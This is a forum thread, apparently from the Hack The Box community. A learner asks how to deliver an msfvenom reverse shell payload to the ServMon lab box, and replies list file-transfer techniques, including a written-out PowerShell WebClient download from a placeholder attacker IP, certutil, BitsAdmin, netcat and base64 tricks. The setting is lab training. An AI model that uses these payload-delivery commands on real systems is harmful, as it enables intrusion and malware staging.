Hi
I was able to create reverse shell payload with msfvenom.
But how do i copy this payload manually over to target windows machine to test my reverse tcp shell?
If target machine is windows then:
via shares (create a samba share on your Linux) | connect and download
via web (setup apache or httpserver on you linux) | connect and download
via powershell (Invoke-WebRequest)
If target is an Linux then:
wget the file from your webserver
sftp the file to the machine
@vizkiz said:
Hi
I was able to create reverse shell payload with msfvenom.
But how do i copy this payload manually over to target windows machine to test my reverse tcp shell?
Just to add in to the great list from @acidbat
Windows:
Certutil can be used as a downloader
Powershell gives you lots of options: (New-Object System.Net.WebClient).DownloadFile("http://YourIP/FiLe.ExT", "TARGET PATH") or IEX etc
BitsAdmin can be used as a downloader
(There are lots and lots of options - look at LOLBAS for other examples)
Linux
Curl works as well
Netcat
Cross platform:
SCP (needs SSH creds)
Base64 - encode your binary, copy the base64 and paste it into a decode (eg on Linux echo "yourbase64code" | base64 -d > evilfilename)
Set up an FTP server on your attacking machine and connect in from the victim
etc
There are countless ways to get your files onto a victim server. Just be imaginative.
Thank you to all of you for help.
But here, i don’t know how to connect to windows box 10.10.14.184.
once if get access to 10.10.14.184, then i can try any of the methods you advised. i am stuck here.
@vizkiz said:
Thank you to all of you for help.
But here, i don’t know how to connect to windows box 10.10.14.184.
once if get access to 10.10.14.184, then i can try any of the methods you advised. i am stuck here.
Why are you trying to connect to 10.10.14.184?
That looks like a user IP address rather than an HTB box.
sorry, it’s my typo. the windows box ip in HTB network, it’s 10.10.10.184 name is ServMon.
I don’t have access to ServMon box, then how do i copy payload, execute payload?
@vizkiz said:
sorry, it’s my typo. the windows box ip in HTB network, it’s 10.10.10.184 name is ServMon.
I don’t have access to ServMon box, then how do i copy payload, execute payload?
Ok - that makes a bit more sense, but you’d be better asking the question in the ServMon thread.
If you dont have access to the machine, how do you know the venom payload is properly configured?
You don’t need to copy any files over for ServMon, so you might be overthinking your approach to this box.
You can’t just copy files over to a remote machine and get them executed. That’s what vulnerabilities and exploits are for. You need to find a way to get the remote machine to execute your commands, so look at which ports it is listening for connections on (using nmap or something similar) and then do research on how you can possibly exploit those services to get remote code execution.
ok Thanks, VbScrub.
I will try explore more.